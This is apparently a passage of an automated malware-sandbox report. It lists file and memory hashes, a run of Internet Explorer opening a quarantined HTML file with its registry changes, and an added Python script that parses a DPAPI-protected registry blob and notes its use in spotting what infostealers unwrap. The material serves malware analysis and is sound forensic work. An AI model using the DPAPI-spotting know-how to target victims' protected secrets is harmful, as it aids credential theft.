SHA256 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b
SHA512 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json

MD5 07ffbe5f24ca348723ff8c6c488abfb8
SHA1 6dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA256 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA512 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json

MD5 4ec1df2da46182103d2ffc3b92d20ca5
SHA1 fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA256 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 05a83e0b8404b63b0bb32816a9af7de0
SHA1 e79d9237b5fadfa394f4020955d0dc1b75b77cf1
SHA256 bd3f9e321bf68ba87d22995e192302c00e14a0e969d43f8f7d670ecdf510c88c
SHA512 0dacceb01f96c317757c95a182114700e15e9e40892e7260be3d026b58757e6f21a89f41471c647c698a81e894df9a0ae64a026b675421177ab762ab428cda42

memory/3604-583-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3604-584-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3604-585-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe

MD5 60dd2030e1ff1f9a3406ddc438893694
SHA1 b01f2c39b1046bc892c9db78898e1c063b21836f
SHA256 d77580f219e5b86e38e34d2125862a58d03a76ac1b6dbb40bc4f65b114bbb4ee
SHA512 15f9aad02632481934b3f271debf73d5cf61bdd824d0f4a47e38b391186f7de16ba5f1d51f391625b945ff14b55d90cd31799b1483837aea732a45effef94246

memory/1808-593-0x0000000000B60000-0x000000000100A000-memory.dmp

memory/3604-594-0x0000000000400000-0x0000000000429000-memory.dmp

memory/5240-605-0x0000000000BD0000-0x0000000000C2C000-memory.dmp

memory/5128-608-0x0000000000400000-0x000000000045E000-memory.dmp

memory/5128-610-0x0000000000400000-0x000000000045E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 fffde59525dd5af902ac449748484b15
SHA1 243968c68b819f03d15b48fc92029bf11e21bedc
SHA256 26bc5e85dd325466a27394e860cac7bef264e287e5a75a20ea54eec96abd0762
SHA512 f246854e8ed0f88ca43f89cf497b90383e05ffa107496b4c346f070f6e9bbf1d9dc1bdcc28cad6b5c7810e3ba39f27d549061b3b413a7c0dd49faacae68cd645

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\5a4ba937-4697-4a8b-b715-4d8850a08764.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ab283f88362e9716dd5c324319272528
SHA1 84cebc7951a84d497b2c1017095c2c572e3648c4
SHA256 61e4aa4614e645255c6db977ea7da1c7997f9676d8b8c3aaab616710d9186ab2
SHA512 66dff3b6c654c91b05f92b7661985391f29763cf757cc4b869bce5d1047af9fb29bbe37c4097ddcfa021331c16dd7e96321d7c5236729be29f74853818ec1484

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 06eb83ab313d92546cc14b4c004dd873
SHA1 46db5e1788fd7a9fb968ff8d24897c9ac8dad53d
SHA256 c9d65c77c4843b9398c8b6e12417292f8e70c9d7864d39ec912814005c90489f
SHA512 ca598d6ea0c63c7f0ff5a0ae7db3e1807ac34a03b60cba1699aa29bc0ebfaeed8803ecc41e624e2c4fa58f9515a8a90a15608be503023797cc1ebebe1c6353fd

Analysis: behavioral18

Detonation Overview

Submitted 2025-02-26 23:27
Reported 2025-02-26 23:30
Platform win7-20241023-en
Max time kernel 121s
Max time network 128s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\kablenet.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c087871aa688db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446774329" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4608EB51-F499-11EF-8504-C668CEC02771} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000abafe974537eba42a70c6cc04c94a12500000000020000000000106600000001000020000000353befe9fe459eb6317b2bc18fad24530b71f8c61b6dfca373a1f275a386f8f9000000000e8000000002000020000000015c01c04859f21174936f41820bdf6a8344a1743f5541c9576b3b8c42f75f722000000080aadfaafa428162cd31eefe0fc6c460f58ac2543bc38f6ff369135df70e7a4f4000000072c8df2cb7070c7b932cdb8b45ed0d43877d393ba67448f17e2430e4b2b15faa049bcdb3207868f1560884cfba81608911a49353c24d70cd8f8f0b4642226bc2 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
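
Two of the Set value (data) rows above carry binary values that the report prints only as hex. The script below is an added example, not part of the sandbox output or of any tool the report came from: it decodes Window_Placement as a WINDOWPLACEMENT structure and shows that DecayDateQueue opens with the DPAPI provider GUID, so it is a CryptProtectData blob bound to one of the sandbox user's master keys. Field layouts are the public WINDOWPLACEMENT definition and the DPAPI blob format documented by DPAPI research tooling; ALG_ID names follow wincrypt.h. Nothing here decrypts the value, which would need the master key file named by the GUID.

```python
"""Decode the two binary values recorded as Set value (data) in the table above.

Added example, not part of the sandbox report. The hex strings are copied from
the report; the struct layouts are the public WINDOWPLACEMENT definition and the
DPAPI blob format produced by CryptProtectData (ALG_ID names from wincrypt.h).
"""
import struct
import uuid

# Internet Explorer\Main\Window_Placement, hex as printed in the report.
WINDOW_PLACEMENT_HEX = (
    "2c0000000200000003000000ffffffffffffffffffffffffffffffff"
    "2400000024000000aa04000089020000"
)
# TabbedBrowsing\NewTabPage\DecayDateQueue, hex as printed in the report
# (split only to keep lines short).
DECAY_DATE_QUEUE_HEX = (
    "01000000" "d08c9ddf0115d1118c7a00c04fc297eb" "01000000"
    "abafe974537eba42a70c6cc04c94a125" "00000000" "02000000" "0000"
    "10660000" "00010000" "20000000"
    "353befe9fe459eb6317b2bc18fad24530b71f8c61b6dfca373a1f275a386f8f9"
    "00000000" "0e800000" "00020000" "20000000"
    "015c01c04859f21174936f41820bdf6a8344a1743f5541c9576b3b8c42f75f72"
    "20000000"
    "80aadfaafa428162cd31eefe0fc6c460f58ac2543bc38f6ff369135df70e7a4f"
    "40000000"
    "72c8df2cb7070c7b932cdb8b45ed0d43877d393ba67448f17e2430e4b2b15faa"
    "049bcdb3207868f1560884cfba81608911a49353c24d70cd8f8f0b4642226bc2"
)

# Every CryptProtectData blob starts with version 1 followed by this provider GUID.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")

ALG_NAMES = {
    0x6603: "CALG_3DES", 0x660E: "CALG_AES_128", 0x660F: "CALG_AES_192", 0x6610: "CALG_AES_256",
    0x8004: "CALG_SHA1", 0x800C: "CALG_SHA_256", 0x800D: "CALG_SHA_384", 0x800E: "CALG_SHA_512",
}
SHOW_CMD = {0: "SW_HIDE", 1: "SW_SHOWNORMAL", 2: "SW_SHOWMINIMIZED", 3: "SW_SHOWMAXIMIZED"}


def parse_window_placement(data: bytes) -> dict:
    """WINDOWPLACEMENT: length, flags, showCmd, ptMin(x,y), ptMax(x,y), rcNormal(l,t,r,b)."""
    if len(data) < 44:
        raise ValueError("WINDOWPLACEMENT needs 44 bytes")
    length, flags, show, *rest = struct.unpack_from("<3I8i", data)
    if length != 44:
        raise ValueError(f"unexpected length field {length}")
    return {
        "flags": flags,
        "show_cmd": SHOW_CMD.get(show, f"SW_{show}"),
        "min_pos": tuple(rest[0:2]),
        "max_pos": tuple(rest[2:4]),
        "normal_rect": tuple(rest[4:8]),
    }


def is_dpapi_blob(data: bytes) -> bool:
    """True when the value carries the DPAPI version + provider GUID header."""
    return (len(data) >= 20 and struct.unpack_from("<I", data)[0] == 1
            and uuid.UUID(bytes_le=data[4:20]) == DPAPI_PROVIDER_GUID)


def parse_dpapi_blob(data: bytes) -> dict:
    """Walk the length-prefixed DPAPI blob; the ciphertext stays opaque without the master key."""
    if not is_dpapi_blob(data):
        raise ValueError("missing DPAPI version/provider header")
    off = 20

    def u32() -> int:
        nonlocal off
        (v,) = struct.unpack_from("<I", data, off)
        off += 4
        return v

    def raw(n: int) -> bytes:
        nonlocal off
        chunk = data[off:off + n]
        if len(chunk) != n:
            raise ValueError("truncated blob")
        off += n
        return chunk

    u32()                                     # master key version
    master_key = uuid.UUID(bytes_le=raw(16))  # names the master key file needed to decrypt
    flags = u32()
    description = raw(u32()).decode("utf-16-le").rstrip("\x00")
    alg_crypt, crypt_bits = u32(), u32()
    salt = raw(u32())
    raw(u32())                                # legacy HMAC key, normally empty
    alg_hash, hash_bits = u32(), u32()
    hmac_key = raw(u32())
    ciphertext = raw(u32())
    signature = raw(u32())
    if off != len(data):
        raise ValueError(f"{len(data) - off} trailing bytes")
    return {
        "master_key_guid": str(master_key),
        "flags": flags,
        "description": description,
        "cipher": ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
        "cipher_bits": crypt_bits,
        "hash": ALG_NAMES.get(alg_hash, hex(alg_hash)),
        "hash_bits": hash_bits,
        "salt_len": len(salt),
        "hmac_key_len": len(hmac_key),
        "ciphertext_len": len(ciphertext),
        "signature_len": len(signature),
    }


if __name__ == "__main__":
    print(parse_window_placement(bytes.fromhex(WINDOW_PLACEMENT_HEX)))
    print(parse_dpapi_blob(bytes.fromhex(DECAY_DATE_QUEUE_HEX)))
```

Run against the hex above, Window_Placement decodes to a maximised window (showCmd SW_SHOWMAXIMIZED, normal rectangle 36,36 to 1194,649), and DecayDateQueue decodes to an AES-256/SHA-512 DPAPI blob with 32 bytes of ciphertext and master key GUID 74e9afab-7e53-42ba-a70c-6cc04c94a125, i.e. the master key file of that name under %APPDATA%\Microsoft\Protect\<SID>\ for the sandbox user. The same header check is a quick way to tell which other registry and file artefacts from a run are DPAPI-wrapped, which is exactly the kind of data an infostealer has to unwrap on the victim.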

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\kablenet.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1388 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabCCC4.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\TarCDE4.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6ef4e09c1ddb79e303cf87cb90a92ac3
SHA1 0f7077b485832147a63fa6150ec8e8bda0f65cec
SHA256 76ce657de7a15759e0417ece1c34d011804296a641a6c487623cdcead14c2dde
SHA512 a3c2da65160b7515683c5caab9fdb3424da8f603d9c1c687cbfb59ddd98cb3a8db1161f27cbc9448033896db9f4f5a45fd497459023872cc25640132bb0e079e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 faa9fb81293de466580c675ff1298d06
SHA1 2ebab92d6fb9ff6349349f9defd0a9fe6aa2b72e
SHA256 ff61b2c6e12913b7702efba9711207820838174564089a7bd165c13375de3a6d
SHA512 332038224dffdd75aa48b4803b2a4f14040b439b0722df514aa3a062733511d868ed98c0993339dc34bf53f90c19641568834cbb96d4969b96d11229fe3e83a8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3e59b908918921d569a0119cf2a5b578
SHA1 1d7c2a8a8b42a23ab6bd3915ca6e4e81189f5f91
SHA256 71a2aaac1b8c2cab6f863b66f05d288beff24554343e880db16598168040a196
SHA512 6c6c516079fcaba98e69126f977db367bd438546c976b3ac04f37e4f3aaf38c544856dcc02d0e48ae46dc2b5f82be63bb52a61df113751ee9ea8557ec3470f19

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 dbb54151e5b462eb37623efddde78923
SHA1 5093a8f56bae304fb90445fbf9be292610539ef3
SHA256 c82cf70a392ca8bbb00bdb087b73610e90a84fbaa21eb537cab53e3a396e9137
SHA512 0a0cceac85daa2dbcd7d6e38f4befb839897aed53a25855297afc14c2dcf803d7b709cf8022729728a97708df0b64f34c4fa83e6136fb6615f00691afb8d83f8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 90bc690cc74cfff8180af159e966bca4
SHA1 9f099b20a5e21aba50bc7c8c7dc79ae18b20f821
SHA256 2d2fe0b2948edceaf14a8f7b254c4b133c976cf9300e4a22a4b18751be79f6f5
SHA512 6eb992c7f57dc65fe52162021a43a611e99cee0f27102bd5c1fb6fbd2200cc6b9af65ed452446ba011b666de116d3463117540b308567040d60755145a4b8a54

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 076432608f94a37468386061e35132e9
SHA1 772a08db2cbf191df1f4b08a6f233656262655ce
SHA256 6fdc30af504c54e2296df8369b32dfe2593cf6afbd603d86bfc8ffd317052547
SHA512 57c2b9af5c4f1ced88fbeda38740c48543afbc4a5d4e5f187930d30e2d5e9c1341dc1081184179edc071ee300bbc0401c878a3f5bdd4f21767d4a7927145ef84

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4199804d4c899f5802ac7d141fd09db8
SHA1 40fb940dcf6ebd7a580b751cb630420842b7cc9b
SHA256 c40487f4170352a7ca477b4cd9ef6e8aef7307e9b6abb6d6e1e450c8e535a18a
SHA512 f0cef39f87e0f8eb3b0de80302128a3f152a7bbca456e9b8d03690f8f0e1902598268c1e04dd42b35cb3c72b497b40cfb322652d071f0bfdf39fba9c661084d8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1530ce84bec874bc5988ceaf348f4d73
SHA1 a966d23f1f9d84e29abd4a8385680b62fa464973
SHA256 b9deee0c6891611942a44d2578ba8f97c6bb6f53060990d5de2c5a1d25928cda
SHA512 ae24ed0aa860d209753a5bf741acc39296bf970b65f2f9139260f71cd22fcfc957372bbcbeb363d868b655d577f5a282ff4e12a23b6e454c7ef0e516e58834ca

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 803e5ef796a0e5356db5d4fd2229686d
SHA1 8865b103e6725890da45e38913191ae55e1465cc
SHA256 1e91a440e377ebc95d58748468e2183b2ad4cb67dd957067d74ce4d53041fe4f
SHA512 db79c8d83872bfb9680f17e47bc0fcb5b385f5ec8eeb4f194aefb1f18f0b6bf5254f7f9eed4b3962da5226306267a9a47681410183680a357c5678d2f65c210e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6b83ef21e9cdf1b2fa2debd409100e96
SHA1 f6f0c6cb15ac9a8a032b12462763a879cba0f448
SHA256 a4846adbaf76abe06ea563412e98c9c2e84248b37850b68157813384bec472ed
SHA512 d228976eb7233167b2356b8db50035132c42f1a689e8e3bc18500b487c540fa0c6e83e694883cac9494d575c0a835e287a03d28d33a35a651d10d6d19afc6abc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b9cc1d82dfc0d90f997cbc2411f2e80a
SHA1 75d560b04426dcfb788b08b44dbdcba5b403a9d4
SHA256 4c000e43bd74473ddc1d7d79af662a936e52cd2861ed5ae2eb170a599b1ab4d5
SHA512 c199a4cd17c0581aa64f660f8aa9ee95bc715fb78c1adc4a2bead2f7424ce2a6bac50b6b1528be3427642ef8c689b315a0ba2facf1ec2abae36e85acfe1b47c7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 895ca9c074c4cd71224ba507d6fe7e58
SHA1 d8dd0ec0c507a22f99efd2c448429ddb75a2b668
SHA256 48d40805e2b048caa969d409b5174e238284c05cae516dac65fa67c188aae7b7
SHA512 60460f16a90642a227df0bea7677c38222a2b79e4b82a840cbab51f57088c0b33176a4720ad19c0ae17dc4c4584cca8da4d3a33517128b74487f220b9267d92f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 733080989e517b14201548eb57d3c2d9
SHA1 1b3b0a20e1d5d878597977d508d00fe17c025fda
SHA256 64b06edbd33ae5834af1c47898bb6adc487afe99334add8c8a6e5bc21a32fce2
SHA512 9dc90c1b1621174773560ca6f7f070f18f0a4861d97a5843bb4e7d0d99fcc1e888324b5e3c474d508a965ab548d595cfe0e898ebd5788841efad8ba33d86ffe0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2bedde8852147592f4b46d9ef17d7e13
SHA1 42a1f44dca66206a6c4d87cef87efda760a1e10f
SHA256 ff325fe4a1264b1693de131ea6b4317f1687cb754e97de82aa7e5398cabf722e
SHA512 1cd1b165bd96cfcf6b156f56a9a24769139a11ab06cbc271f84d309b32dcfc1813ba6bd27552a28ac4f31f21b75ce5228f308875b1ddc77517538b7c8e1a8a45

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 90541e256db539eca1dc64a8d20b3b39
SHA1 5de62e2707c96f7113f3e7f17fe3d8520584cb4d
SHA256 97d9795623347da9fdd013494631a1f3659a88a0db201bc397ff1d327f6ba4d4
SHA512 edeea905f31468f7bea2b381b53e5c53bc7264e9df31578050bba56d78de9c7a94c8f32352ad7208073d3634f64a8760a6ffdaef4c69c1a1b3f42deb770ef03d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b483d9e0c0b3b4887c610aa7e8f72abb
SHA1 ec88a9a71b08f4c70524f34d303e0e7e168524fb
SHA256 bb94b68ed18839eec005a9cc55cdd44bed4e93f43b3c43b776e922e122246015
SHA512 131bb147f281bdd19dddf57073bafbe3e81826b45315fef7ace096e33083e94f72ac5be296280f89d28ce3f49e9c4ad10c920576df709f056be2b271347697b2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4235abcf225c2828736e4853a0cbbd92
SHA1 1564658e2b00901a79ef60ba4c53770cadf22168
SHA256 83be666d5a3a1243a791d33b6f15e448a7fd578b57f1485c9bd1f32572ef74db
SHA512 7d331644f8f2c90c210d2012138134f59c87b822b76d00c929560db14aadc9d19580cdf28ec4cf6f01799b9c77b23aa40fb8768b2165f77fdcff736bfbf71088

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 342bd105be285dbc76a3b9bc82eb1ff1
SHA1 21ec13f8510d5567c0428101d228fece5ac60e6d
SHA256 94337536a92c726b9692927afa36071b918e2022b9b1dbd2c785287945210c2b
SHA512 e3c11643941efdba0232043841f45d76e3d73cd2806837912f0c55e17048de3312eee23ad56d80e638d74a53c03b29df1f9528396efcd0b2589996f4deea5128

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 45dfa035d9cb4879f49969f2427c0097
SHA1 c7e3fbb2d23abb14bc3bb669c5819910c0b985a9
SHA256 d646e0de41785fd7c63ca0c52d622d7e0b4888cdf670a11aae37110fbca95b27
